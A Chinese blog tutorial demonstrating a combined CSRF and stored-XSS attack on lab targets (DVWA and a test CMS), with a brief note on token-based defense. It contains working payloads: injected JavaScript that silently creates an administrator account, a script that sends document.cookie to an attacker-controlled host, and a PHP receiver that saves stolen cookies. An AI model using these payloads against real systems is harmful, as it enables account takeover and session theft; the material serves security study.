csrf+xss组合拳

已于 2024-09-19 14:17:52 修改
阅读量598 收藏 4
点赞数 8
分类专栏: 网络安全 文章标签: 安全
于 2024-06-19 15:28:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/139804377
版权

csrf+xss组合拳

目录

csrf+xss组合拳

 一、环境

二、简单介绍

三、环境演练

四、防御

五、环境搭建

六、流程开始

 一、环境

DVWA网上找

二、简单介绍

这个漏洞很早之前了,但是为了避免大家在面试等等的时候被问到,这里给大家温习一下

CSRF全程是没有黑客参与的,全程都是用户自己在操作

三、环境演练

这个是DVWA的提交表单页面,我这里伪造一个和它一模一样的表单

我自己写好一个表单

 做一些短链接,做一些被攻击者喜欢的名字,被攻击者点击的时候cookie值是有效的,直接自己把自己的密码就改掉了

四、防御

但是这个也是很好防御的在当下环境下根本不会出现,加一个token值即可,比如我们的京东

 

五、环境搭建

靶场cms文章管理系统

六、流程开始

这是系统前端

系统管理后台

而我们要打到后台管理员的cookie,结合前端存储型的xss完全可以实现,那后端怎么被打到cookie呢,我们来从这里添加用户开始分析数据包来说明

看看数据包。其中提交的字段是act=add(添加),username、password

那我们通过编写恶意js

<script>
var xmlhttp = new XMLHttpRequest(); 
xmlhttp.open("POST", "http://192.168.137.45/cms/cms/admin/user.action.php", false); 
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 
xmlhttp.send("act=add&username=waou&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); 
</script>

寻找前端存储型xss,在这里留言板

去后台查看很明显插入了

我们把我书写的恶意js插入进去,这段恶意js创建的是waou用户,插入看看吧

插入成功

看看结果waou是否被创建

成功,不一定添加管理员,也可以盗取cookie,这个漏洞的最大问题还是存储型漏洞,这个框架也没用csrf防御的tokle值,所以导致管理员点击后直接创建新管理员

盗取cookie:

<script>
    var cookie = document.cookie;
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "http://192.168.137.45/ceshi/cookie.php?cookie=" + encodeURIComponent(cookie), true);
    xhr.send();
</script>

攻击机192.168.137.45接收

<?php
if (isset($_GET['cookie'])) {
    $cookie = $_GET['cookie'];
    $file = 'cookie.txt';
    if (file_put_contents($file, $cookie) !== false) {
        echo "Cookie has been saved to cookie.txt";
    } else {
        echo "Failed to save cookie.";
    }
} else {
    echo "No cookie received.";
}
?>

访问之后可以看到cookie已经被盗取

凌晨五点的星
关注
专栏目录
CSRF漏洞
2ed
06-13 1521
CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 CSRF可以做什么? 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,...
xss+csrf组合拳
wo41ge的博客
12-16 3300
今天 就把之前学的东西简单的总结一下吧 【第一拳】存储型 XSS + CSRF
CSRF+XSS组合攻击实战
最新发布
记录学习
07-19 1410
xsscsrf组合攻击漏洞复现
***场景篇--当XSS遇上CSRF
weixin_34303897的博客
03-14 218
你是否有过这样的经历,你发现了一个xss,但是貌似只能叉自己,输出点只有自己可以看见。这个时候,你会觉得这个xss很鸡肋,当你就此忽略这个漏洞的时候,你可能丢掉一个发出组合技能的机会。 今天我们来介绍一个场景,当xss遇上csrf的时候,是否能打出一套漂亮的组合技能。实验环境: ZvulDirll[请用下面我简单修改过的版本] 下载地址:在文章最...
XSS+CSRF组合拳
weixin_50464560的博客
03-12 2485
0x00 前言 今天学习一下 XSS + CSRF 组合拳,现将笔记记录如下。 0x01 靶场环境 本机(Win):192.168.38.1 DVWA(Win):192.168.38.132 Beef(Kali):192.168.38.129 0x02 组合拳思路 第一拳:存储型 XSS + CSRF(存储型 XSS 攻击代码中加入 CSRF 代码链接) 第二拳:CSRF + SelfXSSCSRF 代码中加入 SelfXSS 代码) 0x03...
学习 xss+csrf 组合拳
weixin_67259816的博客
05-28 3349
该篇文章记录了xss+csrf组合拳,无论是存储型xss还是反射型xsscsrf结合在一块,都会有一个更强大的收获。
CSRFXSS组合拳
weixin_60719780的博客
01-17 1135
简单的xsscsrf的组合利用
xss+csrf组合拳
09-20
当它们结合在一起时,会构成一种更加危险的攻击方式,被称为"XSS CSRF组合拳"。下面是一种可能的攻击方式: 1. 攻击者在恶意网站B中插入CSRF payload,并使用该CSRF payload修改用户在A网站的昵称为XSS payload。 2...
XSSCSRF双重攻击!让你欲罢不能
Java-面试
03-31 241
一. 什么是 XSS攻击 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全XSS 常见的注入方法: 在 HTML 中内嵌的文本中,恶意内容以 script 标签形成注入。 在内联的 JavaScript 中,拼接的数据突破了原本的限制(字符串,变量,方法名等)。 在标签属性中,恶意内容包含引号,从而
强网杯—share your mind了解RPO+XSS+CSRF
csu_vc的博客
03-27 2278
RPO(Relative Path Overwrite) 1.What is RPO RPO(相对路径覆盖)是一种通过覆盖目标文件来利用相对URL的技术。要了解这项技术,我们必须首先研究相对网址和绝对网址之间的差异。绝对URL基本上是包含协议和域名的目标地址的完整URL,而相对URL则是不指定域或协议,并使用现有目的地来确定协议和域。 Absolute URL https://gr...
最新污橘ip探针位置源码附视频教程小_IP探针_污橘组合拳_web_
10-03
【标题】"最新污橘ip探针位置源码附视频教程小_IP探针_污橘组合拳_web_" 提供的是一个基于Web的IP定位功能源码,结合了"污橘组合拳"的技术,这通常指的是利用一系列工具或方法来实现更全面的数据抓取和分析。...
XSRF(XSS+CSRF
weixin_30415801的博客
07-09 262
示例: 基本注入的时候,引入js文件。fish.js文件内容如下 $.post('http://localhost:3000/api/transfer', {user: 'zfkt', mone: 500}) 在表单中插入以下代码 <script src="http://locahost:3000/fish.js"></script> 转载于:...
CSRF攻击+XSS攻击
will5451的博客
05-17 502
什么是XSS攻击?如何防止XSS攻击? 1.XSS攻击 XSS(Cross-Site Scripting)—跨站脚本攻击,简称XSS,是一种代码注入攻击,攻击者通过在目标网址注入恶意脚本,使之在用户的的浏览器上运行。利用这些恶意脚本,攻击者获取用户敏感信息如Cookie、SessionID等,进而危害数据安全XSS的本质:恶意代码未经过滤,与网站正常的代码混在一起;浏览器无法分辨哪些脚本是可信的,导致恶意脚本被执行。 2. 如何防止? 由于问题的源头是js代码的注入,那么我们便想办法不让js生效 方式1
CSRFXSS组合拳演示
bring_coco的博客
12-14 1629
一.存储型XSSCSRF(在存储型xss中加入CSRF) 1.配置代理 2.打开CSRFTester工具 3.抓取流量 注意:Form Parameters需要将左面的两行复制过去可修改,第二个红箭头的勾选最好去掉,因为有时候自动生成的poc不能用,需要做一些更改,最后点击Generate HTML进行保存至自定义目录下,名称csrf5.html 4.查看代码把容易被人发现的代码去掉 将两个圈的地方去掉,将红箭头那两行必须value值相等 更改完成一半,还需要一句更改密码 CSRF代码成功
CSRF+XSS组合拳实战
yuan_boss的博客
08-28 1929
由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。在实战中,如果我们发现了XSS存储型漏洞,我们也可以尝试寻找CSRF漏洞,进而扩大危害。
Csrf+Xss组合拳
蚁景网安学院
07-27 918
各位大师傅,第一次在合天发文章,请多多关照今年年初的疫情确实有点突然,打乱了上半年的所有计划(本来是校内大佬带我拿奖的时刻,没了,学长毕业了,就剩下我这个小垃圾带着下一届去搞ctf了,难...
安全CSRFXSS
qq_29635627的博客
03-30 3967
CSRFXSS概念 CSRF:跨站请求伪造( cross site request forgery):盗用用户在某网站的身份,以用户名义向某网站发起恶意请求。原理见下图: 上图中的恶意站点B,有时候可能其实是一个正常的网站。这时候通常会跟XSS一起打一套组合拳进行攻击。 XSS: 跨站脚本攻击(Cross Site Scripting):向某网站植入恶意代码,当用户访问该网站时,恶意代码就会被执行。 例如上图中,B站点其实是一个正常的论坛网站,而黑客把上图中请求4的javascript代码用scrip
CSRF+XSS基础学习
ce666666的博客
01-19 1213
前言 通过靶场学习csrfxss基础 CSRF原理 跨站请求伪造,利用网站对用户网页浏览器的信任,劫持用户当前已登录的WEB应用程序,执行非用户本意的操作。 存在三个角色User、WebA(存在漏洞的网站)、WebB(黑客攻击) 1.User首先登录并信任WebA,WebA通过用户验证会分发User浏览器一个Cookie。 2.WebB向WebA添加链接方式诱导User访问网站WebB。 3.当User点击链接方式,即WebB利用User的浏览器房屋内WebA,发出操作请求。 4。User的浏览器会带着
XSS攻击+CSRF攻击
weixin_34198583的博客
08-29 224
XSS攻击 一旦在DOM解析过程成出现不在预期内的改变(JS代码执行或样式大量变化时),就可能发生XSS攻击 XSS分为反射型XSS,存储型XSS和DOM XSS 反射型XSS是在将XSS代码放在URL中,将参数提交到服务器。服务器解析后响应,在响应结果中存在XSS代码,最终通过浏览器解析执行。 存储型XSS是将XSS代码存储到服务端(数据库、内存、文件系统等),在下次请求同一个页面时就不需要带...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值